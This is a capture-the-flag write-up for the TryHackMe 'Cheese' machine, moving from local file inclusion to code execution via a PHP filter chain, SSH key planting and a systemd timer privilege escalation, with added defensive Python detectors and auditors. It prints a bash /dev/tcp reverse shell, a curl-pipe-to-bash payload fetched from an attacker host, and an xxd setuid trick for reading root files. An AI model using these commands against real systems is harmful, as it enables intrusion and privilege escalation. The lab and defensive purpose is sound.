TryHackMe: Cheese CTF Write-up
Problems :-
1. Find the user.txt flag
2. Find the root.txt flag
Solutions :-
Step 1 :-
Enumerate the target machine using the most common tool, 'nmap'.
What the f***, all ports are open! If every port shows as open, the machine might be set up as a honeypot.
That's why I should try another approach.
Step 2 :-
Take the target's IP address and paste it into your browser.
The website is themed around 'Cheese'. Let's enumerate this website.
1. Fuzz the web directories using the 'dirsearch' tool.
There's nothing particularly special here that gives a hint. Check the 'images' directory.
There are some images, but no other files. The web server is running Apache 2.4.41. Check if any exploits are available for that version.
But you can see that there is a login.php path. Let's check this path for SQL injection vulnerabilities. However, I didn't find any SQL vulnerabilities. By the way, I am using an automated tool called 'sqlmap', which is not good practice. You should perform the check manually.
Step 3 :-
At this point, I am trying to find some common files or directories, such as robots.txt, wp-config.php, messages.html, cgi-bin, etc. In the 'messages.html' path, I found something special.
The URL shows an LFI vulnerability that accepts PHP filters. I am trying to escalate the LFI to RCE via PHP filters. Let's go!
Try '/etc/passwd'; it works.
Step 4 :-
The next step was to use this information to achieve remote code execution (RCE). Through research, I discovered a Python script available online that generates a PHP filter chain payload. This payload lets us exploit the Local File Inclusion (LFI) vulnerability to execute arbitrary commands on the server. The relevant link is provided below:
https://github.com/synacktiv/php_filter_chain_generator.git
Then, write a simple reverse-shell script and save it.
Start a Python HTTP server, then execute the payload.
Rev-shell: bash -i >& /dev/tcp/10.X.X.X/4444 0>&1
Run the following command [
python3 php_filter_chain_generator.py --chain '<?= `curl -s -L 10.X.X.X/fname.sh|bash` ?>'
]
And we get the payload.
Set up the netcat listener.
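From the defender's side, the requests in Steps 3 and 4 leave a clear trace in the web server's access log: a traversal string or a php://filter wrapper in the `file` parameter of messages.html. The following detector is an added example, not code from the original post or from the TryHackMe room; it goes a little beyond the write-up by also handling double URL-encoding, which is a common way such requests are hidden from naive pattern matching. The log lines in SAMPLE_LOG are constructed to look like the traffic this write-up generates, not captured from the machine.

```python
"""Spot LFI and php://filter attempts in Apache access logs.

Added example for this write-up; it is not code from the original post
or from the TryHackMe room. The log lines in SAMPLE_LOG are constructed
to resemble the requests described above (traversal into /etc/passwd
and php://filter wrappers on messages.html).
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache "combined" format up to the size field; the referer/agent tail is ignored.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators, matched against fully URL-decoded path and query values.
INDICATORS = {
    "php_filter_wrapper": re.compile(r"php://filter", re.I),
    "iconv_chain": re.compile(r"convert\.iconv\.", re.I),
    "base64_filter": re.compile(r"convert\.base64-(encode|decode)", re.I),
    "path_traversal": re.compile(r"(\.\./|\.\.\\)"),
    "sensitive_file": re.compile(r"/etc/(passwd|shadow)|wp-config\.php", re.I),
}

SAMPLE_LOG = [  # constructed, not captured from the machine
    '10.0.0.5 - - [10/Jan/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Jan/2024:12:00:02 +0000] "GET /images/cheese.png HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jan/2024:12:00:05 +0000] "GET /messages.html?file=../../../../etc/passwd HTTP/1.1" 200 1400 "-" "curl/7.81"',
    '10.0.0.9 - - [10/Jan/2024:12:00:07 +0000] "GET /messages.html?file=php://filter/convert.iconv.UTF8.UTF16|convert.base64-encode/resource=login.php HTTP/1.1" 200 3000 "-" "curl/7.81"',
    # Double URL-encoded: a single-decode filter would miss this one.
    '10.0.0.9 - - [10/Jan/2024:12:00:09 +0000] "GET /messages.html?file=php%253A%252F%252Ffilter%252Fresource%253D%252Fetc%252Fpasswd HTTP/1.1" 200 1400 "-" "curl/7.81"',
]


def decode_fully(value, rounds=3):
    """URL-decode repeatedly, because double-encoding is used to dodge naive filters."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_line(line):
    """Return [(indicator, field, decoded_value)] for one log line, [] if clean."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    # Check the path itself and every query parameter value.
    fields = [("path", decode_fully(parts.path))]
    fields += [(k, decode_fully(v)) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    findings = []
    for field, value in fields:
        for label, pattern in INDICATORS.items():
            if pattern.search(value):
                findings.append((label, field, value[:80]))
    return findings


def scan(lines):
    """Group findings by source host so repeat offenders stand out."""
    hits = {}
    for line in lines:
        findings = analyse_line(line)
        if findings:
            host = LOG_RE.match(line).group("host")
            hits.setdefault(host, []).extend(findings)
    return hits


if __name__ == "__main__":
    for host, findings in scan(SAMPLE_LOG).items():
        print(host)
        for label, field, value in findings:
            print(f"  {label:<18} {field}={value}")
```

Run against a real log with `scan(open("/var/log/apache2/access.log"))`; the host grouping makes the scanning source obvious. On the fixing side, the root cause is an include that takes a user-controlled filename: restricting it to an allow-list of known files (or at least disabling `allow_url_include` and rejecting any value containing `://` or `..`) removes both the traversal and the filter-wrapper path.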
Step 5 :-
Inject the payload into the vulnerable URL path. Ensure that the netcat listener is already active and awaiting a connection.
Wow, we get the shell.
Quickly switch to a Python 'pty' shell. Execute the following command to stabilize the session.
[python3 -c 'import pty;pty.spawn("/bin/sh")']
Step 6 :-
Let's try to read the user flag at '/home/comte/user.txt'. But permission is denied because we are not the user 'comte'.
Look for anything unusual. I found a '.ssh' directory.
You can write or paste an SSH public key into the 'authorized_keys' file to gain SSH access as the 'comte' user.
Create an SSH key pair by running the following command
[
ssh-keygen -t rsa
]
Save it in any location.
Step 7 :-
After generating an SSH key and adding its public half to the authorized_keys file, log in as the comte user. Run the following command.
[
ssh -i id_rsa comte@<target-ip>
]
Wow! Now we have access as the 'comte' user. Let's read the user flag.
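Steps 6 and 7 work only because a low-privileged shell could write into comte's .ssh directory. sshd's StrictModes setting refuses a key file whose directory chain is group- or world-writable, so the audit below, an added example that is not code from the original post or from the TryHackMe room, checks exactly that for a user's home, .ssh and authorized_keys, and also inventories the keys present so an unexpected entry stands out. Everything demo() builds (the temp directories, their modes and the key line) is constructed.

```python
"""Audit a user's authorized_keys the way sshd's StrictModes does.

Added example for this write-up; it is not code from the original post
or from the TryHackMe room. The write-up gets in by dropping a public
key into /home/comte/.ssh/authorized_keys, so a defender wants two
things: whether the directory chain could have been modified by someone
other than the owner, and an inventory of the keys actually present.
Everything built in demo() (paths, modes, the key line) is constructed.
"""
import os
import stat
import tempfile

WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def check_path(path, owner_uid):
    """Problems sshd would reject under StrictModes for one path component."""
    st = os.lstat(path)
    problems = []
    if st.st_uid not in (owner_uid, 0):
        problems.append(f"owned by uid {st.st_uid}, expected {owner_uid} or root")
    if st.st_mode & WRITABLE_BY_OTHERS:
        problems.append("group- or world-writable")
    return problems


def audit_authorized_keys(home, owner_uid):
    """Check home, ~/.ssh and authorized_keys; return {path: [problems]}."""
    ssh_dir = os.path.join(home, ".ssh")
    keys_file = os.path.join(ssh_dir, "authorized_keys")
    report = {}
    for path in (home, ssh_dir, keys_file):
        if os.path.lexists(path):
            problems = check_path(path, owner_uid)
            if problems:
                report[path] = problems
    return report


def list_keys(keys_file):
    """Inventory (key_type, comment) per key line, skipping blanks and comments."""
    keys = []
    with open(keys_file) as fh:
        for line in fh:
            fields = line.split()
            if not fields or fields[0].startswith("#"):
                continue
            # A line may start with options (from=..., command=...), so locate the type.
            for i, field in enumerate(fields):
                if field.startswith(("ssh-", "ecdsa-", "sk-")):
                    comment = " ".join(fields[i + 2:]) or "<no comment>"
                    keys.append((field, comment))
                    break
    return keys


def demo():
    """Build a weak and a hardened layout under a temp dir; return both audits."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        uid = os.getuid()
        for label, dir_mode, file_mode in (("weak", 0o777, 0o666), ("hardened", 0o700, 0o600)):
            home = os.path.join(tmp, label)
            ssh_dir = os.path.join(home, ".ssh")
            os.makedirs(ssh_dir)
            keys_file = os.path.join(ssh_dir, "authorized_keys")
            with open(keys_file, "w") as fh:
                # Constructed key line; the blob is a placeholder, not a real key.
                fh.write("ssh-rsa AAAAB3NzaC1yc2E_CONSTRUCTED_KEY_BLOB unknown-user@laptop\n")
            os.chmod(home, 0o755)
            os.chmod(ssh_dir, dir_mode)
            os.chmod(keys_file, file_mode)
            results[label] = (audit_authorized_keys(home, uid), list_keys(keys_file))
    return results


if __name__ == "__main__":
    for label, (report, keys) in demo().items():
        print(label, "->", report or "no StrictModes problems", keys)
```

On a real host, call `audit_authorized_keys("/home/comte", pwd.getpwnam("comte").pw_uid)` for each interactive user; the "weak" layout in demo() is the shape that lets a foothold shell plant its own key, and the "hardened" one (0700 on .ssh, 0600 on authorized_keys, owner-only) is what sshd expects.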
Step 8 :-
Let's get root access on this machine.
1. Check 'sudo -l'
I found a vulnerable sudo rule that allows me to execute systemctl, and I can modify a file called exploit.timer, which is used to run an exploit service. The exploit.timer file contained a misconfiguration; however, due to my write access, I was able to fix the settings. I configured the timer to execute every 5 seconds (or more) and then started the service.
After that, run the following commands.
[
sudo /bin/systemctl daemon-reload
sudo /bin/systemctl restart exploit.timer
sudo /bin/systemctl start exploit.timer
systemctl status exploit.timer
]
The service invokes exploit.service, which grants setuid permissions to the xxd binary, enabling it to execute with elevated privileges.
Let's go to 'https://gtfobins.github.io/gtfobins/xxd/' to see how to use xxd with those privileges.
Run the following commands to read the root flag.
[
1. Go to the '/opt' path
2. /opt/xxd "/root/root.txt" | xxd -r
]
And we get the final flag.
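The privilege escalation in Step 8 needs three things to line up: a timer unit that a non-root user can edit, a service that hands the setuid bit to a binary, and a timer interval short enough to be convenient. The auditor below is an added example, not code from the original post or from the TryHackMe room; it parses unit files and flags each of those conditions. The unit texts (EXPLOIT_TIMER, EXPLOIT_SERVICE, BENIGN_SERVICE) are constructed samples modelled on the write-up's description, not the machine's real files, and `audit_unit_file` is the hypothetical entry point for checking units on disk.

```python
"""Audit systemd timer/service units for the misconfiguration used above.

Added example for this write-up; it is not code from the original post
or from the TryHackMe room. It flags what let the timer trick work: a
unit file writable by a non-root user, a service that hands out the
setuid bit, and a timer firing every few seconds. The unit texts below
are constructed samples, not the machine's real files.
"""
import os
import re
import stat

WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH
# chmod u+s / +s / 4755 / 2755 / 6755 style arguments (optional flags like -R first).
SETUID_RE = re.compile(r"\bchmod\s+(?:-\S+\s+)*(?:[ugoa]*\+s|[2467][0-7]{3})\b")
SPAN_RE = re.compile(r"^(\d+)\s*(s|sec|seconds?|m|min|minutes?|h|hr|hours?)?$")
UNIT_SECONDS = {"s": 1, "sec": 1, "second": 1, "seconds": 1, "m": 60, "min": 60,
                "minute": 60, "minutes": 60, "h": 3600, "hr": 3600, "hour": 3600, "hours": 3600}


def parse_unit(text):
    """Minimal unit-file parser: {section: [(key, value), ...]}, duplicates kept."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current].append((key.strip(), value.strip()))
    return sections


def parse_span(value):
    """Seconds for simple systemd time spans ('5s', '1min', '2h', '30'); None otherwise."""
    m = SPAN_RE.match(value.strip())
    if not m:
        return None
    return int(m.group(1)) * UNIT_SECONDS.get(m.group(2) or "s", 1)


def audit_unit(name, text, mode=0o644, uid=0):
    """Return a list of findings for one unit given its text, mode bits and owner."""
    findings = []
    if mode & WRITABLE_BY_OTHERS:
        findings.append(f"{name}: unit file is group- or world-writable")
    if uid != 0:
        findings.append(f"{name}: unit file owned by uid {uid}, not root")
    units = parse_unit(text)
    service = units.get("Service", [])
    runs_as_root = not any(k == "User" and v not in ("root", "0") for k, v in service)
    for key, value in service:
        if key.startswith("Exec") and SETUID_RE.search(value):
            who = "as root" if runs_as_root else "as an unprivileged user"
            findings.append(f"{name}: {key}= sets a setuid/setgid bit {who}: {value}")
    for key, value in units.get("Timer", []):
        secs = parse_span(value) if key in ("OnBootSec", "OnUnitActiveSec", "OnUnitInactiveSec") else None
        if secs is not None and secs < 60:
            findings.append(f"{name}: {key}={value} fires every {secs}s")
    return findings


def audit_unit_file(path):
    """Audit a unit on disk, e.g. audit_unit_file('/etc/systemd/system/exploit.timer')."""
    st = os.stat(path)
    with open(path) as fh:
        return audit_unit(os.path.basename(path), fh.read(), st.st_mode, st.st_uid)


# Constructed samples modelled on the write-up's description.
EXPLOIT_TIMER = """\
[Unit]
Description=constructed sample timer

[Timer]
OnBootSec=5s
OnUnitActiveSec=5s
Unit=exploit.service

[Install]
WantedBy=timers.target
"""

EXPLOIT_SERVICE = """\
[Unit]
Description=constructed sample service

[Service]
Type=oneshot
ExecStart=/bin/chmod u+s /opt/xxd
"""

BENIGN_SERVICE = """\
[Service]
Type=oneshot
User=backup
ExecStart=/usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for finding in (audit_unit("exploit.timer", EXPLOIT_TIMER, 0o664, 1000)
                    + audit_unit("exploit.service", EXPLOIT_SERVICE)
                    + audit_unit("backup.service", BENIGN_SERVICE)):
        print(finding)
```

The fix follows from the findings: unit files under /etc/systemd/system belong to root with mode 0644, a sudo rule for systemctl should name specific units rather than the whole binary, and no service should be setting the setuid bit on a general-purpose tool like xxd at all. A periodic `find / -perm -4000 -type f` comparison against a known baseline would also have caught /opt/xxd the moment the timer fired.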
Thank you everyone.